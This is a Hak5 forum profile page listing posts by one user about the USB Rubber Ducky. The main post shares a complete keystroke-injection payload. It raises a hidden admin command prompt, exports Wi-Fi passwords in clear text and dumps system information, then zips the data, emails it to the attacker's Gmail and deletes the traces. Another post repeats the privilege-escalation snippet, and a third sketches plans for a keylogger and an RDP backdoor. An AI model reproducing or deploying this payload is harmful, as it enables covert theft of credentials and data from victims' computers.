Zeta
-
Posts
8 -
Joined
-
Last visited
Posts posted by Zeta
-
-
I don't want to be that guy but can u mark it as solved thx
-
Thanks :)!!! I definitely will, I plan on adding a whole bunch of stuff. My goals
#1. reconnaissance (this code plus maybe IP address info)
#2. download and implement keylogger
#3. Backdoor (probably enabling RDP since network access is already granted)
-
hmmm, weird. And your using the ducky encoder with the proper keyboard setting for your country?
-
I think this is due to the fact that the online ducky toolkit isn't so reliable. I too used the toolkit as soon as I got my ducky and it didn't work. I then decided to write my own easy script to test and see if my ducky was broken. Sure enough it worked! My suggestion would be to write your own basic script and see if that works. Once you learn how to write the ducky code, you can easily problem solve for more complicated programs. My first Payload is located here if you want to test it out. https://forums.hak5.org/index.php?/topic/35007-payload-wifi-profiles-computer-info-emailed-to-gmail/?hl=%2Bwifi+%2Busb+%2Brubber+%2Bducky
I hope this helps
-
I'm pretty sure the light color is dependent on what version of the Rubber Ducky you have. Mine flashes blue and it works fine. Is their any particular problem you're having with the duck?
-
It could be that u are not bypassing UAC, try this code.
STRING powershell Start-Process cmd -Verb runAsENTERDELAY 555ALT yDELAY 555ENTERENTERALT SPACESTRING MDOWNARROWREPEAT 111ENTER -
Hello fellow Hak5 fans!!! I recently have just written my first USB Rubber Ducky Payload and thought I would share it.
If you spot any errors/improvements let me know .
REM Author: Zeta
REM Date: 4/5/15REM Description: This program collects the computer info and wifi passwords of the victim and emails it to attackers gmail.REM------------------------OPEN & HIDE------------------------DELAY 750GUI rDELAY 400STRING powershell Start-Process cmd -Verb runAsENTERDELAY 555ALT yDELAY 555ENTERENTERALT SPACESTRING MDOWNARROWREPEAT 111ENTERREM ----------------------COLLECT & DUMP----------------------STRING set TEMPDIR=%systemdrive%\de-tempENTERSTRING mkdir %TEMPDIR%ENTERSTRING cd %TEMPDIR%ENTERSTRING netsh wlan export profile key=clearENTERSTRING set > info.txtENTERSTRING cd..ENTERREM ---------------------------------------------ZIPPING FILE---------------------------------------------DELAY 450STRING echo Set objArgs = WScript.Arguments > _zipIt.vbsENTERSTRING echo InputFolder = objArgs(0) >> _zipIt.vbsENTERSTRING echo ZipFile = objArgs(1) >> _zipIt.vbsENTERSTRING echo CreateObject("Scripting.FileSystemObject").CreateTextFile(ZipFile, True).Write "PK" ^& Chr(5) ^& Chr(6) ^& String(18, vbNullChar) >> _zipIt.vbsENTERSTRING echo Set objShell = CreateObject("Shell.Application") >> _zipIt.vbsENTERSTRING echo Set source = objShell.NameSpace(InputFolder).Items >> _zipIt.vbsENTERSTRING echo objShell.NameSpace(ZipFile).CopyHere(source) >> _zipIt.vbsENTERSTRING echo wScript.Sleep 2000 >> _zipIt.vbsENTERSTRING CScript _zipIt.vbs %TEMPDIR% %systemdrive%\de-temp.zipENTERDELAY 200REM -----------------------------------EMAIL LOG VIA GMAIL-----------------------------------STRING powershell -command $SMTPServer = 'smtp.gmail.com'; $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587); $SMTPInfo.EnableSsl = $true; $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('USERNAME', 'PASSWORD'); $ReportEmail = New-Object System.Net.Mail.MailMessage; $ReportEmail.From = 'EMAIL'; $ReportEmail.To.Add('EMAIL'); $ReportEmail.Attachments.Add('%systemdrive%\de-temp.zip'); $ReportEmail.Subject = '%computername%'; $SMTPInfo.Send($ReportEmail)ENTERDELAY 100REM ---------------------DELETE AND END---------------------STRING RD /S /Q "%systemdrive%\de-temp"ENTERSTRING TYPE nul > %systemdrive%\de-temp.zipENTERSTRING DEL /Q %systemdrive%\de-temp.zipENTERSTRING TYPE nul > %systemdrive%\_zipIt.vbsENTERSTRING DEL /Q %systemdrive%\_zipIt.vbsENTERSTRING exitENTER
need help! Blue light
in Classic USB Rubber Ducky
Posted
My final suggestion (which probably should have been my first) would be to check the FAQ. :)